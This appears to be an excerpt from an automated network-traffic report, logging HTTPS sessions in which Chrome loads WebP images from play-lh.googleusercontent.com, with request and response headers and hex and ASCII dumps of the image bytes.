                                                                                                                                                                                                                                  Data Ascii: 0VG<'G8y ^O>5M%PKCvyQe>:.AOsTfU@X3i$.I4*47l#n`=wQvdn TR6`G+Fm^=XOC}EK6%Qif)_S-1IL*VR]dO`4JH>
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1050INData Raw: 81 e2 d4 56 37 69 33 dc 60 84 84 04 74 3b ff e2 fa 67 fa 6a 2e 61 43 16 af 94 ea 80 2d ee 2c 85 ce c2 0e 44 ca d2 f3 96 8c 43 29 bd 94 b9 33 77 38 a5 c3 2f 14 47 25 14 4c b8 b3 c6 e0 1c 03 ac 7f 5c 73 9f a6 a9 bd 36 24 68 64 d9 9b 02 7b 53 88 ff 73 96 6d 23 1e 7e aa 1e 86 5e 66 59 3b 25 4c bf 75 40 9e dd 40 aa ba 87 32 08 59 ba 26 6f 11 6d c3 0b 3d 18 f0 0b a3 88 7c fb 42 b5 a8 3c 8d 78 d8 a2 8f c1 9d e5 97 f9 26 f4 12 0d d2 7c 3f 82 2d fc 5c 06 42 64 94 e8 09 9e 70 94 69 47 b7 01 54 ea 35 ea a1 5a 6e 64 f3 c9 af e6 cc 26 38 92 50 e7 9f 93 00 79 5d 7e c5 dd 5f 13 bb a8 f4 d1 48 ee 91 b0 ca bb 59 f5 2a 1c ea e6 0c cc bb 90 7e 31 25 90 08 67 40 06 36 c7 31 2d 1b 7c 20 57 a3 57 17 23 e7 6f 9e b4 dc 1e f3 34 a6 e0 b6 86 7f 95 b2 df dd a0 7b e0 da e0 3c c5 99
                                                                                                                                                                                                                                  Data Ascii: V7i3`t;gj.aC-,DC)3w8/G%L\s6$hd{Ssm#~^fY;%Lu@@2Y&om=|B<x&|?-\BdpiGT5Znd&8Py]~_HY*~1%g@61-| WW#o4{<


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  121192.168.2.649977142.250.185.2464431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC504OUTGET /d6Y9q1SJXDASeD-93qMXL59Bq_JCd6Bm1cZr_zodlkVnq4ck3TpTWYcMpBwOsUGMQHw=s64-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC529INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 326
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:46 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 04:53:46 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  Age: 1
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC326INData Raw: 52 49 46 46 3e 01 00 00 57 45 42 50 56 50 38 4c 31 01 00 00 2f 3f c0 0f 00 85 5c 5b db 8e 3d 7a ce 2a 2b 7d 8e c2 e9 54 a7 b6 9d d2 b6 6d db b6 6d 6b 3c 73 15 df fb 7e ff 7c ef 18 45 44 ff 27 40 fe 33 d8 58 dd a0 0b a9 ab 4d 51 25 d7 d6 a6 eb 42 eb ea c2 1d 01 74 cd b0 ae 5a 03 5a 34 43 30 62 4a 3d 2c ab 96 00 86 54 7d 30 f8 8d 30 f3 cd b1 f6 4d d5 1d 02 7b df 52 8b ec 01 67 df 50 ab c8 1a 70 23 bd df 90 cc 00 37 03 06 55 ba 26 43 28 1d bb be 51 5e bf 7c 05 69 31 c3 b6 6b 52 61 da 86 6a 1d ba 54 92 09 8c 3a 12 1b 61 3b 2a 58 15 14 15 ed a9 91 80 a8 68 7f 47 7e ff bf b9 7f a3 2b 79 7e 1a 55 55 3e 3f 9c e8 2e 1f 9e 33 1c 01 74 8d b0 a2 6a 03 5a 54 43 40 89 29 f5 b0 ac 6a 05 f0 b0 f8 01 14 7d 23 97 96 87 6f 89 62 91 26 be 9d 07 40 dc 81 fb 6f 65 62 09 d6 0e
                                                                                                                                                                                                                                  Data Ascii: RIFF>WEBPVP8L1/?\[=z*+}Tmmk<s~|ED'@3XMQ%BtZZ4C0bJ=,T}00M{RgPp#7U&C(Q^|i1kRajT:a;*XhG~+y~UU>?.3tjZTC@)j}#ob&@oeb


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  122192.168.2.649975216.58.212.1504431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1093OUTGET /_GRprxsBpsoPiM1vG1Qf6nHgqhBePssy13A3rff_JoYV4qn4dYP9Zs5yed_K_QYOdA=w526-h296-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://play.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC533INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 9204
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  Age: 5844
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC857INData Raw: 52 49 46 46 ec 23 00 00 57 45 42 50 56 50 38 20 e0 23 00 00 30 7e 00 9d 01 2a a6 00 28 01 3e 51 20 8d 45 23 a1 a1 15 e9 46 44 38 05 04 b1 01 d8 0f 36 9a bf e7 3f 23 bb de bd 1f 79 fc 8f fc a7 f9 86 b1 bf 76 fe d3 fa 4f fb 2f 24 95 95 e5 99 cb ff eb bf c2 fe 57 7c cf fe df ff 4b fc 77 f7 cf 83 df 9f ff f2 7b 81 7e 9f ff bf ff 09 fb 61 da 97 cc 4f f5 2f f1 df f5 ff c1 7b b9 ff bf fd 80 f7 45 fd ab d4 03 fa 1f f8 ff 58 ef f9 1f ff fd c9 bf bb 7f b4 ff ff ee 1f fc df fc 17 a6 a7 ed f7 c1 b7 f6 ef f8 7f b8 9f 02 7f af 9f f9 3f 74 bf ff fc 80 7f f1 f5 00 ff d1 ea 01 e9 af d8 4f ef 7d ba 7f 80 fc 9c eb bf f6 0f b5 7c c1 e2 65 f2 af b9 7f b0 f5 b5 fc 87 fc ef 0d fe 1e ff 9f ea 05 f9 67 f3 0f f2 9e 24 fb 76 34 bf dc 6f 50 5f 6d be 99 fe e7 fc 27 e4 7f a5 67 fb 7e
                                                                                                                                                                                                                                  Data Ascii: RIFF#WEBPVP8 #0~*(>Q E#FD86?#yvO/$W|Kw{~aO/{EX?tO}|eg$v4oP_m'g~
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: 05 d6 05 48 3a 23 ca fd 96 13 02 6c be 4e 6c ef c5 51 05 92 d9 34 44 52 6f 93 ed 8a f7 e8 8f e7 02 50 9b c3 35 b1 94 ed 24 d4 98 89 24 7a c9 99 ad cb b5 84 00 89 19 d9 c7 45 07 e4 76 73 8f 67 5b 71 f6 55 a7 8d 94 c9 72 08 76 3a de 90 28 e6 3e c9 d6 b8 64 47 78 b3 8d f9 ae 89 fa f7 71 e2 56 5c e0 88 0f f3 ee 45 82 6d 1b c7 8f e7 de 09 4a 84 31 df 22 2e d7 7f af b9 fd cd 3c ce b0 93 79 dd c6 15 a6 75 88 0a 1b de 66 33 aa 67 04 94 b5 c8 40 8c 81 52 73 04 6a 0c 1f ab c4 94 b3 2b 3f 55 03 67 b9 42 20 f3 a8 6f 94 5e 25 b4 93 e6 56 75 b0 9e e0 00 fe f6 55 da 20 2c fd 31 aa e7 f3 2a a1 ac f3 ba 88 73 c3 c0 00 04 f0 b4 18 fc 4c 71 73 93 5e d4 f3 31 dc 09 ba 62 89 b3 e8 b2 f2 62 92 e9 04 cb f3 5e ed 8e dd 3e b5 65 97 47 28 a7 9b 0e 0c 28 79 c5 4f 21 9a 65 b3 e1 c7
                                                                                                                                                                                                                                  Data Ascii: H:#lNlQ4DRoP5$$zEvsg[qUrv:(>dGxqV\EmJ1".<yuf3g@Rsj+?UgB o^%VuU ,1*sLqs^1bb^>eG((yO!e
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: 2d 6f 6b bb 31 2e d4 0a ef 9d 31 ae 79 6a 6f 6c 0c 7b c2 68 39 7e ec 8e 23 d4 0a cf 6c e1 fa 56 f1 da 12 5e d5 b5 e3 28 b3 00 0f 18 4f ce 0d 7b 5c 46 bc 50 e8 9e 00 49 17 4d fd e5 88 f4 8b f5 4c 33 24 cf dc 3b 4a 5c 32 99 a8 ac c7 ea fd 72 02 11 83 73 b8 f6 3f 19 7b 78 97 65 56 4a b8 ec 81 0b 0f d8 76 c0 e7 43 1f c8 49 68 91 57 e5 86 ae c5 a3 51 b7 03 b4 8d 59 de fe a1 a9 a0 5b 54 31 4d 6a f7 c1 d2 1d 3c a3 62 ee f0 d9 24 f9 43 89 5e 55 fc 9d e3 12 42 1c ea 0d be 34 b5 b2 93 86 0a 22 09 21 d0 4c 94 c7 f8 b5 ac 27 83 7a 42 f0 18 5c 71 33 42 f3 c6 36 57 8f f0 1b c9 ff 41 6c 52 1f 19 38 27 16 25 60 08 3f ae be f6 0a 8f d3 bd 1a d2 87 2f 29 94 64 92 52 d9 cc 81 83 33 1c bf 23 ff 4c 03 f5 93 07 08 e6 9e 4d f6 0c bb 0f 62 c8 cb 02 33 83 4b 0b cd a3 80 1d 79 1e
                                                                                                                                                                                                                                  Data Ascii: -ok1.1yjol{h9~#lV^(O{\FPIML3$;J\2rs?{xeVJvCIhWQY[T1Mj<b$C^UB4"!L'zB\q3B6WAlR8'%`?/)dR3#LMb3Ky
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: f0 53 f8 80 83 b7 29 d1 65 15 98 b2 25 0a 66 d0 3f 88 16 c3 b9 52 1c bc 53 bb cf ef d9 1c be 01 3f 2f f3 8b 53 8d f4 39 04 51 39 17 e0 13 fb d9 c9 74 de 61 88 d0 f6 3c a1 e9 71 56 26 a7 e3 48 e1 2d dc d3 56 2e eb 3f c3 8e 7a 5e 4e f6 4c 10 81 ce 9c ad 8d a3 3c cb ff db a5 2b 5b 5b 65 98 b2 49 97 07 2c 64 f7 96 3e fa 52 90 3e 98 92 fe 62 46 50 23 fe 07 d5 fd 56 29 e9 6c 0b b8 82 ad 79 6c 92 84 7a 26 82 6b 0a 3d 8d b7 50 8c 78 d8 cf 63 e8 6b 32 90 05 86 76 2f ed 01 a3 a9 ec 8e ac 19 a7 6b 32 90 43 1d 42 78 89 0f 53 03 96 7a cc c9 2e 2a 78 47 9e 81 af 4f 25 6f 4a 91 cf 8c 93 a0 51 23 d7 47 22 25 b1 7a 1f 07 be 80 6d d8 f0 d9 76 ee 6c ab f5 2b 9a 45 63 9a 8e b8 da d8 60 88 ec f0 96 a5 70 9a ea a0 f5 e1 e2 ce 4e 53 ea 34 09 a9 0f 4f 54 47 af 69 d2 0e 67 01 37
                                                                                                                                                                                                                                  Data Ascii: S)e%f?RS?/S9Q9ta<qV&H-V.?z^NL<+[[eI,d>R>bFP#V)lylz&k=Pxck2v/k2CBxSz.*xGO%oJQ#G"%zmvl+Ec`pNS4OTGig7
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: 76 3f 72 1d 92 a1 aa 5b cb 6d 1a f5 04 63 79 d9 9d c9 fb 8f e4 c5 9f 12 66 c3 b8 0a 6d 2a 4b c3 b4 de d3 12 0b 19 1b 76 1e 4c 64 aa 02 67 3a bd 49 25 8f 80 1c 78 1a 4c 7f e4 e8 be 96 96 14 af 56 d4 da e0 00 8e e7 02 3a 3f 59 7f 78 35 96 21 1f 3b 75 c9 8e b7 78 c9 92 e7 f1 1e ff 38 ca f2 33 f2 0b 9a 12 64 19 db ff 1b 0e 71 a5 5c e3 2e 87 e3 d0 ee 88 5c 08 85 1b 5f 09 ff 4f e4 1b 66 ee 74 3b fb ee b5 a1 f2 26 88 ac c0 c1 65 34 e4 8a fe b3 99 6c ea 31 38 25 ce 7e 97 89 4c b6 cd ce 67 bb 98 fe 0e c4 db 5f fe 93 a1 f1 d3 86 38 dc 3b 00 1d e6 cb 3a 0f 60 ab 57 58 da ee d9 30 dd c8 b7 02 60 b7 bb ac 4a 64 98 e8 d8 5c 6e 24 64 00 51 5b 26 c7 9c c3 9e aa 48 65 29 86 41 59 8f 41 f2 d0 a2 c2 e0 fd c4 ca 3f 78 61 26 bb a6 aa a5 a2 70 e3 da eb 57 4b 42 d1 32 0d 76 4f
                                                                                                                                                                                                                                  Data Ascii: v?r[mcyfm*KvLdg:I%xLV:?Yx5!;ux83dq\.\_Oft;&e4l18%~Lg_8;:`WX0`Jd\n$dQ[&He)AYA?xa&pWKB2vO
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: bf ec de 70 20 cb 93 14 1f f0 90 5e 50 59 7b 96 cd 34 9d f7 d7 e7 e5 37 33 6a 44 44 27 5b 24 d4 66 9e 99 85 b3 cb 27 89 07 c2 3c d8 15 a9 61 ea 96 5a c3 01 ba 6a 7b 61 3a 93 19 e3 e5 f3 fa 2d 00 c6 a2 b2 9a 30 0d 76 36 10 0e 3e 9d 16 82 bd 93 8c 66 23 95 23 55 46 94 fd 97 5c 43 07 ea a8 02 9a 06 24 96 d3 60 43 a8 35 66 8f 39 00 76 b0 a6 a4 22 3c d7 17 75 8d 4e 52 34 1d ed 50 1d 4d c0 ca 19 62 84 e5 6d 68 f9 65 5b 2f 57 76 fc 15 e6 7c db f8 ca b4 f8 3a 3a 99 62 98 84 5e a8 26 fd 03 1a c4 b5 33 cf cc 21 65 e9 2b 67 ab bc bd 31 6f bc d4 41 a6 cd b3 28 fa 08 3e 95 dc ca 83 49 fa 26 01 89 f9 41 70 c5 8f c5 34 2b 0d d7 5f 4c e9 5e 00 4c e7 53 e7 be 1a 26 62 3b 70 cb b1 5a 2d 79 06 35 f3 41 2a 2d 72 1d 85 88 b5 b5 2b bd e8 0a d8 72 40 0f ab ba 29 77 ba 16 38 f6
                                                                                                                                                                                                                                  Data Ascii: p ^PY{473jDD'[$f'<aZj{a:-0v6>f##UF\C$`C5f9v"<uNR4PMbmhe[/Wv|::b^&3!e+g1oA(>I&Ap4+_L^LS&b;pZ-y5A*-r+r@)w8
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: 39 98 d1 e2 e1 23 df a5 e5 24 b2 81 f6 0a 40 89 27 6b 8f 75 53 a0 bb 1d cd fa ba 2a 56 3b 32 8d 80 cd 54 2d 41 b3 7b e9 b6 c4 60 7e ec 20 39 30 c3 63 34 43 17 7a 9f bf 0c 46 1b fc f2 82 c2 7a ee 7e 29 b5 50 81 96 d6 3c 2d 76 28 dd e6 74 9b e2 84 00 b3 47 a2 f7 23 9e 29 b3 0f c0 bc 8f bb bf a2 c4 8c 74 ee e8 66 04 e7 e2 c6 86 27 ec 06 38 44 f4 5c fb 88 35 1b 58 5e 7b a1 dd 7d 81 5d 19 88 9f b5 c7 e1 31 4f 17 48 89 92 83 78 79 3d 29 8e be fa 96 c6 39 4a fb 30 0b 7d 62 d8 33 75 16 14 89 36 2d 7b 61 7d b1 22 15 88 9c 1c 80 0d 45 de 58 12 9a 32 d8 47 3b ff fb 79 98 0f 86 15 e5 c2 3a bf 6a e1 12 40 69 f4 42 2e d9 57 b6 63 36 45 39 cb 63 c9 3d ee c9 9e 83 3e 54 ab 91 a2 dc 80 0d fd 92 63 41 72 4b 01 8d fa 0b c4 59 60 de 6a 00 53 43 8e f7 7e 26 9f ef 0b 7b 77 15
                                                                                                                                                                                                                                  Data Ascii: 9#$@'kuS*V;2T-A{`~ 90c4CzFz~)P<-v(tG#)tf'8D\5X^{}]1OHxy=)9J0}b3u6-{a}"EX2G;y:j@iB.Wc6E9c=>TcArKY`jSC~&{w
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC7INData Raw: d2 5c 04 ed 30 00 00
                                                                                                                                                                                                                                  Data Ascii: \0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  123192.168.2.649976142.250.185.2464431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC509OUTGET /rbz2GOYtKwW-yK99VC_CBSUL_k2PWkkL4NfYubMEmKBCPbGuNxZb_pP7N2WAKZsQUw=w416-h235-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC533INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 39178
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:39:33 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 04:39:33 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  Age: 854
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC857INData Raw: 52 49 46 46 02 99 00 00 57 45 42 50 56 50 38 4c f6 98 00 00 2f 9f 81 32 10 4d 40 72 db 48 92 24 db 31 6b 44 fd ff c1 19 dd a8 59 cf 11 fd 9f 00 fd 3f b3 bc bf 2f 1e 45 ef 9d 3e 7c 1f 6b 54 75 48 0a 76 ba 6d bb 5b be 23 ec 2e a8 3a a6 db 76 77 d7 74 6b 6e a8 e8 90 64 83 97 73 fc 50 77 c6 00 23 49 9c 9b cf ee 6e cf 2c d6 c7 13 31 45 92 43 b5 d9 ee 9e b6 ed 39 22 b7 a9 27 00 23 6d 6f 85 96 e9 ee c5 76 c9 63 59 79 14 76 e9 5d 79 7b f0 c5 06 30 90 48 79 9b f7 2a be e6 0a d8 66 4d 1a a9 df 5f e7 6b 12 1f 40 b7 a4 58 2d f5 f8 6b 38 c7 91 dd 02 a2 9a 1e f8 92 16 30 53 91 88 40 52 2b 50 fe 8a a4 48 52 00 36 92 08 0e 7c 45 bb b2 1e 88 11 62 ed 2f 30 70 b0 8b 90 e7 ea 16 1e d4 91 00 49 83 0b a4 19 95 ef 30 d8 01 3b 22 85 b2 b9 4a 9a 96 6f 01 1c 80 44 49 55 05 5a ea
                                                                                                                                                                                                                                  Data Ascii: RIFFWEBPVP8L/2M@rH$1kDY?/E>|kTuHvm[#.:vwtkndsPw#In,1EC9"'#movcYyv]y{0Hy*fM_k@X-k80S@R+PHR6|Eb/0pI0;"JoDIUZ
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: a3 59 e6 36 8c 8c 59 1a 1e e6 ff 97 db 91 63 cf 75 96 d1 13 6f 98 99 99 99 99 99 99 99 99 99 99 99 93 65 66 66 66 1e 08 33 2f a3 a7 78 df 73 ce 7b ce bd 7b 5e 57 c9 27 15 3a 8b 95 75 a4 91 ab f0 82 5d 85 17 ab a9 3c 45 78 bc e0 89 34 5a 0e 5a e1 64 19 ad 5b 58 a1 a9 c6 55 b0 1a 57 21 eb 14 d6 32 c3 1b 5c e6 ad e6 2d ac 25 57 4b 56 98 ac c5 2a 64 2d 56 b3 57 ba 5a a6 59 87 39 19 2d 56 a3 2b 59 5b 85 46 61 5a 72 52 2d 9f c2 53 2d 8d 16 de a9 96 5d 85 46 ff c2 53 85 46 0b 57 8b d5 b8 0a b9 f2 56 68 2d 5c 85 69 a6 5a 9a 6a b4 58 f9 16 5e 37 c1 71 15 72 e5 2c b9 9a 53 58 8b d5 c8 d2 91 ab 65 74 b5 64 05 ab 95 25 cb 55 78 c9 55 c8 0a d3 e8 16 de 6a 3a 37 53 85 ac 30 df 80 ab b0 ab 25 57 9e 2a 34 3a 52 3c 55 d8 c5 d5 62 35 ae c2 34 5a ac d6 c5 0d 4e 35 61 a6 d1
                                                                                                                                                                                                                                  Data Ascii: Y6Ycuoefff3/xs{{^W':u]<Ex4ZZd[XUW!2\-%WKV*d-VWZY9-V+Y[FaZrR-S-]FSFWVh-\iZjX^7qr,SXetd%UxUj:7S0%W*4:R<Ub54ZN5a
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: 03 80 4c 12 c7 11 87 d9 59 44 f0 f4 12 2d 9e 72 cc 9c 43 af f1 44 fc 74 f4 60 81 2c 9a 06 18 29 12 b5 8d 0c 3b 63 1d 6c 80 6d 59 20 39 47 8f 97 0c 9c 44 d2 6e 6e 9d 7d 3e dd dc 37 60 71 22 7c 04 0d 13 25 97 48 d0 74 4d 37 24 5c f9 01 c0 ea 2b f4 13 f4 e5 25 ba 41 30 a1 78 82 95 1a 97 84 5d 0e 31 38 7d 5b 58 9d db c5 1d 60 8c c0 a8 7b 3a 88 8f 90 44 1e de 3b c2 c0 c4 a5 2a cd 91 c7 39 7a b3 6c 4a 19 44 9e a3 da 01 a8 9f cf 15 89 60 4b 72 af c3 b5 1f b5 64 31 f4 e8 5d 4f e2 da c3 2c 80 44 74 bd 2a 24 6c ed bb 36 6c d8 c3 4d 47 b4 9e bd 0e 62 03 4e 06 78 72 ca 90 45 5c 31 26 b7 a1 3b 09 63 08 be 69 b8 b8 4d 5c 07 90 bf 46 5c 00 4e 1b 59 12 69 88 ca 43 c5 45 81 04 08 37 5e 50 82 13 4f 5b 02 56 c5 fd 46 23 63 74 22 90 19 b3 b4 9a dd b0 a1 71 4e 90 f0 cf ce 6a
                                                                                                                                                                                                                                  Data Ascii: LYD-rCDt`,);clmY 9GDnn}>7`q"|%HtM7$\+%A0x]18}[X`{:D;*9zlJD`Krd1]O,Dt*$l6lMGbNxrE\1&;ciM\F\NYiCE7^PO[VF#ct"qNj
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: be 70 ed 81 76 8e eb 20 a8 6d 2b 9b 55 c5 6c 36 87 b4 05 a4 33 a8 f7 15 0b 73 1a ec 1a 02 7f b7 e7 38 d1 86 0f 30 3a f9 12 51 c1 b6 32 49 26 2a 78 5b 60 4d 54 a5 06 05 44 f9 ee 9b 6d b8 6d bb ed 85 3b 87 2c 9d ae 70 01 4f f0 ee 02 2f f0 82 52 43 cc 65 d1 04 bb f0 76 b2 5b 72 79 9c d1 6a b5 f6 8a 12 dc f6 f6 d4 83 a1 d6 ea 6e 1a 12 69 ab 67 8a 7f 3e 0d 00 f3 05 12 ef 4e 08 bd 0e f0 38 c4 45 0f 67 01 9e 76 41 92 99 15 81 2a 98 7f e9 f8 c9 12 62 b1 1b 1f 12 a0 ea d9 e1 02 b1 cb 6b 06 94 9a 1f d4 bb 05 40 d1 2d fd f3 85 e0 e2 51 fc aa 00 df b3 6f 64 8b dc 08 2e 0d c1 2f 03 d4 42 6c 68 d8 e0 92 31 f1 66 3d b8 d3 9f 25 60 bc 39 ed 1b a7 83 81 40 93 6a ac b1 6c 67 78 b3 1c 7b 82 c6 5e 55 60 bb 19 cc 75 53 59 b8 46 d4 3f dd 1e 38 05 51 ea 3d e9 3e b8 67 56 90 c5
                                                                                                                                                                                                                                  Data Ascii: pv m+Ul63s80:Q2I&*x[`MTDmm;,pO/RCev[ryjnig>N8EgvA*bk@-Qod./Blh1f=%`9@jlgx{^U`uSYF?8Q=>gV
